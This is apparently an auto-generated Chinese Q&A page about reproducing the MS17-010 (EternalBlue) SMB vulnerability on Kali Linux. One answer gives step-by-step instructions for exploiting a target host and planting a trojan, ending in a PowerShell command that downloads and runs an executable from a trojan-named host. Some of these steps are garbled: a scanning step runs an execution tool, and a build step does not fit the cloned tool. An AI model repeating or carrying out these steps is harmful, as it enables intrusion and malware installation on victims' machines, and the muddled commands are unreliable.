kali复现ms17-010
时间: 2023-10-10 10:06:26 浏览: 194
ms17-010是指一个漏洞编号为MS17-010,CVE-2017-0143/0144/0145/0146/0147/0148的漏洞。要在kali中复现ms17-010,可以使用kali中的Metasploit框架来进行操作。首先,你需要使用ms17-010的辅助模块进行扫描,可以使用命令"use auxiliary/scanner/smb/smb_ms17_010"。然后,使用ms17-010的攻击模块来执行攻击,可以使用命令"use exploit/windows/smb/ms17_010_eternalblue"。通过执行这些命令,你将能够复现ms17-010漏洞。
相关问题
kali利用ms17-010挂马
根据提供的引用内容,我们无法回答与网站挂马和文本输入相关的问题。关于kali利用ms17-010挂马的问题,我们需要先了解一下ms17-010是什么。ms17-010是指微软在2017年3月份发布的一个安全补丁,用于修复Windows操作系统中的SMBv1漏洞。攻击者可以利用该漏洞远程执行代码,从而控制受感染的计算机。以下是kali利用ms17-010挂马的步骤:
1. 打开终端,输入以下命令更新kali系统:
```shell
sudo apt-get update
sudo apt-get upgrade
```
2. 下载ms17-010漏洞利用工具,可以从GitHub上下载:
```shell
git clone https://github.com/worawit/MS17-010.git
```
3. 进入MS17-010目录,运行以下命令编译漏洞利用工具:
```shell
cd MS17-010
make
```
4. 执行以下命令,扫描目标主机是否存在SMBv1漏洞:
```shell
./send_and_execute 192.168.1.100 whoami.exe
```
5. 如果目标主机存在SMBv1漏洞,执行以下命令,获取目标主机的Shell:
```shell
./eternalblue 192.168.1.100 shellcode.bin
```
6. 执行以下命令,连接目标主机的Shell:
```shell
nc 192.168.1.100 4444
```
7. 在目标主机的Shell中执行以下命令,下载并执行挂马程序:
```shell
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://www.trojan.com/1.exe','C:\Windows\Temp\1.exe');Start-Process 'C:\Windows\Temp\1.exe'"
```
需要注意的是,上述步骤仅供学习和研究使用,请勿用于非法用途。
kali2023 ms17-010
回答: Kali 2023是一个操作系统,而MS17-010是一个漏洞。MS17-010是指Microsoft Windows中的一个漏洞,它存在于服务器消息块1.0 (SMBv1)服务器中。这个漏洞可能允许攻击者通过发送特殊设计的消息来执行远程代码。\[3\]在MS17-010漏洞爆发后,出现了很多变种的病毒和勒索软件,利用这个漏洞进行恶意活动,例如收集比特币。这个漏洞的危险威胁主要集中在端口445、135和139,这三种端口都可能给主机带来危险。永恒之蓝是一个利用MS17-010漏洞进行传播的恶意软件,它对高校、警察局、交通和ATM机等造成了影响。\[2\]所以,如果你在Kali 2023中遇到了MS17-010漏洞,你需要采取相应的安全措施来保护你的系统免受攻击。
#### 引用[.reference_title]
- *1* *2* *3* [Kali liunx MS17-010漏洞验证](https://blog.csdn.net/weixin_35714534/article/details/117021010)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item]
[ .reference_list ]
阅读全文